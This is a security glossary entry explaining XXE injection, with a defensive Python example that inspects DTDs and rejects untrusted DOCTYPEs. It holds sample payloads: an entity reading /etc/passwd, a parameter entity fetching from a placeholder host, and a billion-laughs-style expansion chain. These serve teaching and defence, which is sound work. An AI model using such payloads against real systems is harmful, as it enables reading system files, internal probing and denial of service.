
XML External Entity (XXE)

A vulnerability in XML parsers that allows attackers to include external entities, leading to file disclosure, SSRF, or denial of service.

XML External Entity injection (XXE) is a vulnerability that targets applications parsing XML input. It exploits the XML specification's support for external entities, which are references to external resources that the XML parser resolves during document processing. When an application processes user-supplied XML without disabling external entity resolution, an attacker can define malicious entities that read local files, make server-side requests to internal systems, or cause denial of service through entity expansion attacks.

How It Works

XML documents can define entities in their Document Type Definition (DTD). An external entity references a resource using a URI, such as <!ENTITY xxe SYSTEM "file:///etc/passwd">. When the parser processes the document and encounters &xxe; in the content, it replaces the entity reference with the contents of the specified file. If the parsed output is returned to the attacker in the application's response, the attacker receives the file contents directly.

When the application does not reflect parsed XML content in its response, blind XXE techniques are used instead. The attacker defines an external entity that triggers an out-of-band connection to an attacker-controlled server, often exfiltrating data through URL parameters. For example, a parameter entity can read a local file and send its contents as part of a DNS lookup or HTTP request to the attacker's infrastructure.

XXE can also be used for server-side request forgery by specifying internal network addresses as entity URIs. The XML parser makes requests on behalf of the server, allowing the attacker to scan internal ports, access internal APIs, and interact with services that are not directly reachable from the internet. Entity expansion attacks, where entities reference other entities in a recursive or deeply nested structure, can consume server memory and cause denial of service.
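The three abuses above all hinge on what the DTD declares, so a defender can classify a document before any parser resolves anything. The example below is added here and is not code from the glossary's authors: it uses only Python's standard-library expat bindings, the function and sample names (classify_dtd, parse_untrusted, XXE_FILE and so on) are my own, and the sample documents are constructed for the demonstration. classify_dtd reports external entities (file disclosure or SSRF), parameter entities (the blind, out-of-band variant) and the estimated fan-out of internal entities (denial of service), while parse_untrusted is the hardened setting: refuse any DOCTYPE at all.

```python
import re
import xml.parsers.expat

class UnsafeXML(Exception): pass   # raised by parse_untrusted() when a document carries any DTD
class _DtdDone(Exception): pass    # sentinel: stop expat right after the DTD, before anything expands

def classify_dtd(data: bytes) -> dict:
    """Report what a document's DTD declares without resolving or expanding anything."""
    internal, report = {}, {"external": [], "parameter": [], "max_expansion": 0}
    p = xml.parsers.expat.ParserCreate()
    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if is_param:                                 # '<!ENTITY % x ...>': blind XXE building block
            report["parameter"].append(name)
        if sysid is not None or pubid is not None:   # SYSTEM/PUBLIC: file read or SSRF
            report["external"].append((name, sysid or pubid))
        elif value is not None:                      # internal entity: expansion (DoS) candidate
            internal[name] = value
    def on_end_doctype():
        raise _DtdDone                               # the body (and its &refs;) is never parsed
    p.EntityDeclHandler, p.EndDoctypeDeclHandler = on_entity, on_end_doctype
    try:
        p.Parse(data, True)
    except _DtdDone:
        pass
    memo = {}
    def size(name):  # approximate expanded length of an entity, following nested references
        if name not in memo:
            memo[name] = 0   # provisional value breaks reference cycles (illegal in XML anyway)
            memo[name] = sum(size(s) if i % 2 and s in internal else len(s)
                             for i, s in enumerate(re.split(r"&([^&;\s]+);", internal[name])))
        return memo[name]
    report["max_expansion"] = max((size(n) for n in internal), default=0)
    return report

def parse_untrusted(data: bytes) -> list:
    """Hardened parse: any DOCTYPE aborts, so no entity can be declared, let alone resolved."""
    p, tags = xml.parsers.expat.ParserCreate(), []
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {name!r} refused (system id {sysid!r})")
    p.StartDoctypeDeclHandler = on_doctype
    p.StartElementHandler = lambda tag, attrs: tags.append(tag)
    p.Parse(data, True)
    return tags                                      # element names in document order

# Constructed samples (not from the page): a file-read entity, a parameter entity of the
# kind blind XXE uses, and a 10-level expansion chain (3 * 10**9 bytes if ever expanded).
XXE_FILE = b'<!DOCTYPE d [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><d>&xxe;</d>'
XXE_BLIND = b'<!DOCTYPE d [<!ENTITY % remote SYSTEM "http://dtd.example.invalid/x.dtd">]><d/>'
EXPANSION = ("<!DOCTYPE d [" + '<!ENTITY e0 "lol">' + "".join(
    f'<!ENTITY e{i} "{"&e%d;" % (i - 1) * 10}">' for i in range(1, 10)) + "]><d>&e9;</d>").encode()
```

Run classify_dtd on an upload before handing it to the real parser, and log its report; in production the simplest correct policy is parse_untrusted's, since almost no application that accepts XML from users has a legitimate need for a client-supplied DTD.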

Why It Matters

XXE remains a relevant vulnerability because XML is still widely used in SOAP APIs, document processing, SVG handling, and configuration file parsing. Many applications accept XML input in unexpected places, such as file upload endpoints that process DOCX, XLSX, or SVG files, all of which are XML-based formats. Security assessments should test any XML processing endpoint for XXE, including less obvious entry points where XML is embedded within other file formats.
